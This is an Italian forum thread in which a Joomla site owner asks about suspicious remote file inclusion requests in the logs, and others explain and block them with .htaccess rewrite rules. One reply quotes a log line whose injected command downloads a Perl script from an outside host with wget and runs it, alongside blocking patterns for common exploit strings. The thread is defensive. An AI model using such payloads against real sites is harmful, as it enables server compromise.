- Home
- Categorie
- Coding e Sistemistica
- Joomla!
- sef.class.php?mosConfig_absolute_path=http ma è un attacco o cosa?
-
sef.class.php?mosConfig_absolute_path=http ma è un attacco o cosa?
Negli ultimi giorni sono apparsi questi indirizzi nei vari file di log 404
http://dominio/components/com_sef/sef.class.php?mosConfig_absolute_path=http://spam.com/....txt??il sito ha sef advance installato e funziona benissimo ma non riesco a trovare molte info..
è forse qualcuno che cerca di sfruttare una vulnerabilità di qualche componente per url rewrite? se si quale??
grazie ciao
-
ok credo di aver trovato qualcosina:
If Joomla was the target for the attack, we need to know how. Most servers have access logs that can give more information in that regard and save the used URL.
There was a problem with code/SQL injection in Joomla 1.0.3. URLs like these pointed to an hack attempt:
Quote
xxx.xxx.xxx.xxx - - [01/Apr/2006:12:00:00 0000] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://medenin.me.funpic.de/cmd.txt?&cmd=cd%20/tmp;wget%20http://medenin.me.funpic.de/google.txt;perl%20google.txt;rm%20google.txt? HTTP/1.0" 200 167 "-" "Mozilla/5.0"forse miravano a SEF404x che è inserito nelle componenti a rischio :():
-
Sono gli attacchi attualmente piu comuni in joomla, remote file inclusion.
Se il server è settato correttamente non vanno a buon fine. Per sicurazza inserisci nel tuo .htaccess queste righe:########## Begin - Rewrite rules to block out some common exploits # # Block out any script trying to set a mosConfig value through the URL RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) # Block out any script trying to base64_encode crap to send via URL RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) # Block out any script that includes a <script> tag in URL RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR] # Block out any script trying to set a PHP GLOBALS variable via URL RewriteCond %{QUERY_STRING} GLOBALS(=|[|\%[0-9A-Z]{0,2}) # Block out any script trying to modify a _REQUEST variable via URL RewriteCond %{QUERY_STRING} _REQUEST(=|[|\%[0-9A-Z]{0,2}) # Send all blocked request to homepage with 403 Forbidden error! RewriteRule ^(.*)$ index.php [F,L] # ########## End - Rewrite rules to block out some common exploits
-
Ti ringrazio, ho aggiunto il codice che hai suggerito, la prudenza non è mai troppa.
ne ho trovati altri, sono sempre tre tentativi in serie tutti con diverso IP
il link punta sempre a un file di testo contenente un codice php.
grazie saluti